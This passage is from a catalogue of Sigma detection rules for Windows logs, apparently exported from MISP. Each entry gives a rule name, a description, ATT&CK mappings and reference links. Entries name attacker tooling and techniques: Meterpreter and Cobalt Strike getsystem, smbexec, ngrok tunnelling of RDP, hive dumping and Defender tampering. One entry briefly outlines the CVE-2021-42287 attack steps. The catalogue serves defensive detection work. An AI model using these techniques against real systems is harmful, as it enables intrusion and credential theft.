  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9162. Table References

Links

https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5101

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_antimalware_platform_expired.yml

Windows Defender Submit Sample Feature Disabled

Detects disabling of the "Automatic Sample Submission" feature of Windows Defender.

The tag is: misp-galaxy:sigma-rules="Windows Defender Submit Sample Feature Disabled"

Windows Defender Submit Sample Feature Disabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9163. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide

https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_config_change_sample_submission_consent.yml

Windows Defender Threat Detected

Detects actions taken by Windows Defender malware detection engines

The tag is: misp-galaxy:sigma-rules="Windows Defender Threat Detected"

Windows Defender Threat Detected has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 9164. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_threat.yml

Windows Defender Configuration Changes

Detects suspicious changes to the Windows Defender configuration

The tag is: misp-galaxy:sigma-rules="Windows Defender Configuration Changes"

Windows Defender Configuration Changes has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9165. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide

https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_suspicious_features_tampering.yml

Windows Defender Exploit Guard Tamper

Detects when someone is adding or removing applications or folders from exploit guard "ProtectedFolders" or "AllowedApplications"

The tag is: misp-galaxy:sigma-rules="Windows Defender Exploit Guard Tamper"

Windows Defender Exploit Guard Tamper has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9166. Table References

Links

https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_config_change_exploit_guard_tamper.yml

Win Defender Restored Quarantine File

Detects the restoration of files from the defender quarantine

The tag is: misp-galaxy:sigma-rules="Win Defender Restored Quarantine File"

Win Defender Restored Quarantine File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9167. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_restored_quarantine_file.yml

PSExec and WMI Process Creations Block

Detects blocking of process creations originating from PSExec and WMI commands

The tag is: misp-galaxy:sigma-rules="PSExec and WMI Process Creations Block"

PSExec and WMI Process Creations Block has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9168. Table References

Links

https://twitter.com/duff22b/status/1280166329660497920

https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction?WT.mc_id=twitter#block-process-creations-originating-from-psexec-and-wmi-commands

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_asr_psexec_wmi.yml

BITS Transfer Job Downloading File Potential Suspicious Extension

Detects new BITS transfer job saving local files with potential suspicious extensions

The tag is: misp-galaxy:sigma-rules="BITS Transfer Job Downloading File Potential Suspicious Extension"

BITS Transfer Job Downloading File Potential Suspicious Extension has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"

Table 9169. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_transfer_saving_susp_extensions.yml

BITS Transfer Job With Uncommon Or Suspicious Remote TLD

Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.

The tag is: misp-galaxy:sigma-rules="BITS Transfer Job With Uncommon Or Suspicious Remote TLD"

BITS Transfer Job With Uncommon Or Suspicious Remote TLD has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"

Table 9170. Table References

Links

https://twitter.com/malmoeb/status/1535142803075960832

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_transfer_via_uncommon_tld.yml

BITS Transfer Job Download To Potential Suspicious Folder

Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location

The tag is: misp-galaxy:sigma-rules="BITS Transfer Job Download To Potential Suspicious Folder"

BITS Transfer Job Download To Potential Suspicious Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"

Table 9171. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_trasnfer_susp_local_folder.yml

New BITS Job Created Via PowerShell

Detects the creation of a new bits job by PowerShell

The tag is: misp-galaxy:sigma-rules="New BITS Job Created Via PowerShell"

New BITS Job Created Via PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"

Table 9172. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_job_via_powershell.yml

BITS Transfer Job Download From Direct IP

Detects a BITS transfer job downloading file(s) from a direct IP address.

The tag is: misp-galaxy:sigma-rules="BITS Transfer Job Download From Direct IP"

BITS Transfer Job Download From Direct IP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"

Table 9173. Table References

Links

https://isc.sans.edu/diary/22264

https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/

https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin

https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_transfer_via_ip_address.yml

New BITS Job Created Via Bitsadmin

Detects the creation of a new bits job by Bitsadmin

The tag is: misp-galaxy:sigma-rules="New BITS Job Created Via Bitsadmin"

New BITS Job Created Via Bitsadmin has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"

Table 9174. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_job_via_bitsadmin.yml

Certificate Private Key Acquired

Detects when an application acquires a certificate private key

The tag is: misp-galaxy:sigma-rules="Certificate Private Key Acquired"

Certificate Private Key Acquired has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal or Forge Authentication Certificates - T1649" with estimative-language:likelihood-probability="almost-certain"

Table 9176. Table References

Links

https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/capi2/win_capi2_acquire_certificate_private_key.yml

Ngrok Usage with Remote Desktop Service

Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour

The tag is: misp-galaxy:sigma-rules="Ngrok Usage with Remote Desktop Service"

Ngrok Usage with Remote Desktop Service has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

Table 9177. Table References

Links

https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg

https://ngrok.com/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml

Failed DNS Zone Transfer

Detects when a DNS zone transfer failed.

The tag is: misp-galaxy:sigma-rules="Failed DNS Zone Transfer"

Failed DNS Zone Transfer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DNS - T1590.002" with estimative-language:likelihood-probability="almost-certain"

Table 9178. Table References

Links

https://kb.eventtracker.com/evtpass/evtpages/EventId_6004_Microsoft-Windows-DNS-Server-Service_65410.asp

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_dns_server_failed_dns_zone_transfer.yml

DNS Server Error Failed Loading the ServerLevelPluginDLL

Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded

The tag is: misp-galaxy:sigma-rules="DNS Server Error Failed Loading the ServerLevelPluginDLL"

DNS Server Error Failed Loading the ServerLevelPluginDLL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9179. Table References

Links

https://twitter.com/gentilkiwi/status/861641945944391680

https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx

https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_dns_server_susp_server_level_plugin_dll.yml

Windows Update Error

Detects Windows update errors including installation failures and connection issues. Defenders should observe this in case critical update KBs aren’t installed.

The tag is: misp-galaxy:sigma-rules="Windows Update Error"

Windows Update Error has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Compromise Infrastructure - T1584" with estimative-language:likelihood-probability="almost-certain"

Table 9180. Table References

Links

https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows10/1903/W10_1903_Pro_20200714_18362.959/WEPExplorer/Microsoft-Windows-WindowsUpdateClient.xml

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_windows_update_client/win_system_susp_system_update_error.yml

Critical Hive In Suspicious Location Access Bits Cleared

Detects events from the Kernel-General ETW indicating that the access bits of a hive with a system like hive name located in the temp directory have been reset. This occurs when an application tries to access a hive and the hive has not be recognized since the last 7 days (by default). Registry hive dumping utilities such as QuarksPwDump were seen emitting this behavior.

The tag is: misp-galaxy:sigma-rules="Critical Hive In Suspicious Location Access Bits Cleared"

Critical Hive In Suspicious Location Access Bits Cleared has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

Table 9181. Table References

Links

https://github.com/nasbench/Misc-Research/blob/b20da2336de0f342d31ef4794959d28c8d3ba5ba/ETW/Microsoft-Windows-Kernel-General.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_kernel_general/win_system_susp_critical_hive_location_access_bits_cleared.yml

Potential RDP Exploit CVE-2019-0708

Detect suspicious error on protocol RDP, potential CVE-2019-0708

The tag is: misp-galaxy:sigma-rules="Potential RDP Exploit CVE-2019-0708"

Potential RDP Exploit CVE-2019-0708 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"

Table 9182. Table References

Links

https://github.com/Ekultek/BlueKeep

https://github.com/zerosum0x0/CVE-2019-0708

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/termdd/win_system_rdp_potential_cve_2019_0708.yml

Volume Shadow Copy Mount

Detects volume shadow copy mount via Windows event log

The tag is: misp-galaxy:sigma-rules="Volume Shadow Copy Mount"

Volume Shadow Copy Mount has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

Table 9183. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_ntfs/win_system_volume_shadow_copy_mount.yml

Suspicious Usage of CVE_2021_34484 or CVE 2022_21919

During exploitation of this vulnerability, two logs (Provider_Name:Microsoft-Windows-User Profiles Service) with EventID 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \Users\TEMP is created may be created during the exploitation. Viewed on 2008 Server

The tag is: misp-galaxy:sigma-rules="Suspicious Usage of CVE_2021_34484 or CVE 2022_21919"

Table 9184. Table References

Links

https://packetstormsecurity.com/files/166692/Windows-User-Profile-Service-Privlege-Escalation.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_user_profiles_service/win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml

NTFS Vulnerability Exploitation

This the exploitation of a NTFS vulnerability as reported without many details via Twitter

The tag is: misp-galaxy:sigma-rules="NTFS Vulnerability Exploitation"

NTFS Vulnerability Exploitation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Exhaustion Flood - T1499.001" with estimative-language:likelihood-probability="almost-certain"

Table 9185. Table References

Links

https://www.bleepingcomputer.com/news/security/windows-10-bug-corrupts-your-hard-drive-on-seeing-this-files-icon/

https://twitter.com/wdormann/status/1347958161609809921

https://twitter.com/jonasLyk/status/1347900440000811010

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/ntfs/win_system_ntfs_vuln_exploit.yml

Local Privilege Escalation Indicator TabTip

Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode

The tag is: misp-galaxy:sigma-rules="Local Privilege Escalation Indicator TabTip"

Local Privilege Escalation Indicator TabTip has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001" with estimative-language:likelihood-probability="almost-certain"

Table 9186. Table References

Links

https://github.com/antonioCoco/JuicyPotatoNG

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_distributed_com/win_system_lpe_indicators_tabtip.yml

NTLMv1 Logon Between Client and Server

Detects the reporting of NTLMv1 being used between a client and server. NTLMv1 is insecure as the underlying encryption algorithms can be brute-forced by modern hardware.

The tag is: misp-galaxy:sigma-rules="NTLMv1 Logon Between Client and Server"

NTLMv1 Logon Between Client and Server has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002" with estimative-language:likelihood-probability="almost-certain"

Table 9187. Table References

Links

https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows10/22H2/W10_22H2_Pro_20230321_19045.2728/WEPExplorer/LsaSrv.xml

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/lsasrv/win_system_lsasrv_ntlmv1.yml

Potential CVE-2021-42287 Exploitation Attempt

The attacker creates a computer object using those permissions with a password known to her. After that she clears the attribute ServicePrincipalName on the computer object. Because she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.

The tag is: misp-galaxy:sigma-rules="Potential CVE-2021-42287 Exploitation Attempt"

Potential CVE-2021-42287 Exploitation Attempt has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"

Table 9188. Table References

Links

https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_directory_services_sam/win_system_exploit_cve_2021_42287.yml

smbexec.py Service Installation

Detects the use of smbexec.py tool by detecting a specific service installation

The tag is: misp-galaxy:sigma-rules="smbexec.py Service Installation"

smbexec.py Service Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9189. Table References

Links

https://github.com/fortra/impacket/blob/edef71f17bc1240f9f8c957bbda98662951ac3ec/examples/smbexec.py#L60

https://github.com/fortra/impacket/blob/33058eb2fde6976ea62e04bc7d6b629d64d44712/examples/smbexec.py#L286-L296

https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_hack_smbexec.yml

Invoke-Obfuscation Via Stdin - System

Detects Obfuscated Powershell via Stdin in Scripts

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Stdin - System"

Invoke-Obfuscation Via Stdin - System has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9190. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_stdin_services.yml

Meterpreter or Cobalt Strike Getsystem Service Installation - System

Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation

The tag is: misp-galaxy:sigma-rules="Meterpreter or Cobalt Strike Getsystem Service Installation - System"

Meterpreter or Cobalt Strike Getsystem Service Installation - System has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Create Process with Token - T1134.002" with estimative-language:likelihood-probability="almost-certain"

Table 9191. Table References

Links

https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/

https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml

Remote Access Tool Services Have Been Installed - System

Detects service installation of different remote access tools software. These software are often abused by threat actors to perform

The tag is: misp-galaxy:sigma-rules="Remote Access Tool Services Have Been Installed - System"

Remote Access Tool Services Have Been Installed - System has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9192. Table References

Links

https://redcanary.com/blog/misbehaving-rats/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_remote_access_software.yml

Anydesk Remote Access Software Service Installation

Detects the installation of the anydesk software service. Which could be an indication of anydesk abuse if you the software isn’t already used.

The tag is: misp-galaxy:sigma-rules="Anydesk Remote Access Software Service Installation"

Table 9193. Table References

Links

https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_anydesk.yml

Important Windows Service Terminated Unexpectedly

Detects important or interesting Windows services that got terminated unexpectedly.

The tag is: misp-galaxy:sigma-rules="Important Windows Service Terminated Unexpectedly"

Table 9194. Table References

Links

https://www.randori.com/blog/vulnerability-analysis-queuejumper-cve-2023-21554/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_terminated_unexpectedly.yml

New PDQDeploy Service - Client Side

Detects PDQDeploy service installation on the target system. When a package is deployed via PDQDeploy it installs a remote service on the target machine with the name "PDQDeployRunner-X" where "X" is an integer starting from 1

The tag is: misp-galaxy:sigma-rules="New PDQDeploy Service - Client Side"

New PDQDeploy Service - Client Side has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 9195. Table References

Links

https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_pdqdeploy_runner.yml

RemCom Service Installation

Detects RemCom service installation and execution events

The tag is: misp-galaxy:sigma-rules="RemCom Service Installation"

RemCom Service Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9196. Table References

Links

https://github.com/kavika13/RemCom/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_remcom.yml

PAExec Service Installation

Detects PAExec service installation

The tag is: misp-galaxy:sigma-rules="PAExec Service Installation"

PAExec Service Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9197. Table References

Links

https://www.poweradmin.com/paexec/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_paexec.yml

Invoke-Obfuscation RUNDLL LAUNCHER - System

Detects Obfuscated Powershell via RUNDLL LAUNCHER

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation RUNDLL LAUNCHER - System"

Invoke-Obfuscation RUNDLL LAUNCHER - System has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9198. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_rundll_services.yml

Invoke-Obfuscation Via Use Rundll32 - System

Detects Obfuscated Powershell via use Rundll32 in Scripts

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Use Rundll32 - System"

Invoke-Obfuscation Via Use Rundll32 - System has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9199. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_rundll32_services.yml

PowerShell Scripts Installed as Services

Detects powershell script installed as a Service

The tag is: misp-galaxy:sigma-rules="PowerShell Scripts Installed as Services"

PowerShell Scripts Installed as Services has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9201. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_powershell_script_installed_as_service.yml

CSExec Service Installation

Detects CSExec service installation and execution events

The tag is: misp-galaxy:sigma-rules="CSExec Service Installation"

CSExec Service Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9202. Table References

Links

https://github.com/malcomvetter/CSExec

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_csexecsvc.yml

CobaltStrike Service Installations - System

Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement

The tag is: misp-galaxy:sigma-rules="CobaltStrike Service Installations - System"

CobaltStrike Service Installations - System has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9203. Table References

Links

https://www.sans.org/webcasts/119395

https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/

https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_cobaltstrike_service_installs.yml

Suspicious Service Installation

Detects suspicious service installation commands

The tag is: misp-galaxy:sigma-rules="Suspicious Service Installation"

Suspicious Service Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 9204. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_susp.yml

Invoke-Obfuscation COMPRESS OBFUSCATION - System

Detects Obfuscated Powershell via COMPRESS OBFUSCATION

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation COMPRESS OBFUSCATION - System"

Invoke-Obfuscation COMPRESS OBFUSCATION - System has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9205. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_compress_services.yml

HackTool Service Registration or Execution

Detects installation or execution of services

The tag is: misp-galaxy:sigma-rules="HackTool Service Registration or Execution"

HackTool Service Registration or Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9206. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_hacktools.yml

Invoke-Obfuscation STDIN+ Launcher - System

Detects Obfuscated use of stdin to execute PowerShell

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation STDIN+ Launcher - System"

Invoke-Obfuscation STDIN+ Launcher - System has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9207. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_stdin_services.yml

Moriya Rootkit - System

Detects the use of Moriya rootkit as described in the securelist’s Operation TunnelSnake report

The tag is: misp-galaxy:sigma-rules="Moriya Rootkit - System"

Moriya Rootkit - System has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 9208. Table References

Links

https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_moriya_rootkit.yml

ProcessHacker Privilege Elevation

Detects a ProcessHacker tool that elevated privileges to a very high level

The tag is: misp-galaxy:sigma-rules="ProcessHacker Privilege Elevation"

ProcessHacker Privilege Elevation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9209. Table References

Links

https://twitter.com/1kwpeter/status/1397816101455765504

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_pua_proceshacker.yml

Mesh Agent Service Installation

Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers

The tag is: misp-galaxy:sigma-rules="Mesh Agent Service Installation"

Mesh Agent Service Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 9210. Table References

Links

